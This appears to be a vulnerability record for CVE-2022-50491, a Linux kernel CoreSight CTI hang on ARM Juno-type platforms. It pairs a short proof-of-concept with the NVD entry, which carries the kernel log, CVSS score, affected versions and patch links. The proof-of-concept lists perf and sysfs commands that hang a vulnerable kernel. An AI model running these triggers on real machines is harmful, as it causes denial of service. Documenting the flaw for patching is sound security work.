CVE-2022-50491

# CVE-2022-50491 Proof of Concept # Trigger the coresight CTI hang vulnerability on ARM Juno platform # or similar platforms with coresight support # Method 1: Using perf record with cs_etm (CoreSight ETM) tracing # This command triggers the cti_enable_hw() path which calls # pm_runtime_resume() in atomic context, causing system hang perf record -e cs_etm//u -- ls # Method 2: Running Perf Coresight tests # Execute the perf coresight test suite which also triggers # the vulnerable code path perf test coresight # Method 3: Direct sysfs trigger (alternative) # Enable coresight sink and source via sysfs echo 1 > /sys/bus/coresight/devices/tmc_etr0/enable_sink echo 1 > /sys/bus/coresight/devices/etm0/enable_source # Expected result on vulnerable kernel: # BUG: sleeping function called from invalid context # at drivers/base/power/runtime.c:1151 # in_atomic(): 1, irqs_disabled(): 128, non_block: 0 # System will hang and become unresponsive

{"cve": {"id": "CVE-2022-50491", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:46.073", "lastModified": "2026-03-25T00:32:51.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncoresight: cti: Fix hang in cti_disable_hw()\n\ncti_enable_hw() and cti_disable_hw() are called from an atomic context\nso shouldn't use runtime PM because it can result in a sleep when\ncommunicating with firmware.\n\nSince commit 3c6656337852 (\"Revert \"firmware: arm_scmi: Add clock\nmanagement to the SCMI power domain\"\"), this causes a hang on Juno when\nrunning the Perf Coresight tests or running this command:\n\n perf record -e cs_etm//u -- ls\n\nThis was also missed until the revert commit because pm_runtime_put()\nwas called with the wrong device until commit 692c9a499b28 (\"coresight:\ncti: Correct the parameter for pm_runtime_put\")\n\nWith lock and scheduler debugging enabled the following is output:\n\n coresight cti_sys0: cti_enable_hw -- dev:cti_sys0 parent: 20020000.cti\n BUG: sleeping function called from invalid context at drivers/base/power/runtime.c:1151\n in_atomic(): 1, irqs_disabled(): 128, non_block: 0, pid: 330, name: perf-exec\n preempt_count: 2, expected: 0\n RCU nest depth: 0, expected: 0\n INFO: lockdep is turned off.\n irq event stamp: 0\n hardirqs last enabled at (0): [<0000000000000000>] 0x0\n hardirqs last disabled at (0): [<ffff80000822b394>] copy_process+0xa0c/0x1948\n softirqs last enabled at (0): [<ffff80000822b394>] copy_process+0xa0c/0x1948\n softirqs last disabled at (0): [<0000000000000000>] 0x0\n CPU: 3 PID: 330 Comm: perf-exec Not tainted 6.0.0-00053-g042116d99298 #7\n Hardware name: ARM LTD ARM Juno Development Platform/ARM Juno Development Platform, BIOS EDK II Sep 13 2022\n Call trace:\n dump_backtrace+0x134/0x140\n show_stack+0x20/0x58\n dump_stack_lvl+0x8c/0xb8\n dump_stack+0x18/0x34\n __might_resched+0x180/0x228\n __might_sleep+0x50/0x88\n __pm_runtime_resume+0xac/0xb0\n cti_enable+0x44/0x120\n coresight_control_assoc_ectdev+0xc0/0x150\n coresight_enable_path+0xb4/0x288\n etm_event_start+0x138/0x170\n etm_event_add+0x48/0x70\n event_sched_in.isra.122+0xb4/0x280\n merge_sched_in+0x1fc/0x3d0\n visit_groups_merge.constprop.137+0x16c/0x4b0\n ctx_sched_in+0x114/0x1f0\n perf_event_sched_in+0x60/0x90\n ctx_resched+0x68/0xb0\n perf_event_exec+0x138/0x508\n begin_new_exec+0x52c/0xd40\n load_elf_binary+0x6b8/0x17d0\n bprm_execve+0x360/0x7f8\n do_execveat_common.isra.47+0x218/0x238\n __arm64_sys_execve+0x48/0x60\n invoke_syscall+0x4c/0x110\n el0_svc_common.constprop.4+0xfc/0x120\n do_el0_svc+0x34/0xc0\n el0_svc+0x40/0x98\n el0t_64_sync_handler+0x98/0xc0\n el0t_64_sync+0x170/0x174\n\nFix the issue by removing the runtime PM calls completely. They are not\nneeded here because it must have already been done when building the\npath for a trace.\n\n[ Fix build warnings ]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.7", "versionEndExcluding": "5.10.154", "matchCriteriaId": "CABD39F1-EBF4-4697-9B6A-AA778FAC9FE5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.77", "matchCriteriaId": "756161DE-EFE3-4008-964A-DFE360B188B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.7", "matchCriteriaId": "65D387F0-209C-4EAD-98BA-C4B430A840C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4c365a0c21aaf2b8fcc88de8dc298803288f61ac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6746eae4bbaddcc16b40efb33dab79210828b3ce", "source": "416baaa9-dc9f-4396-8d5 ... (truncated)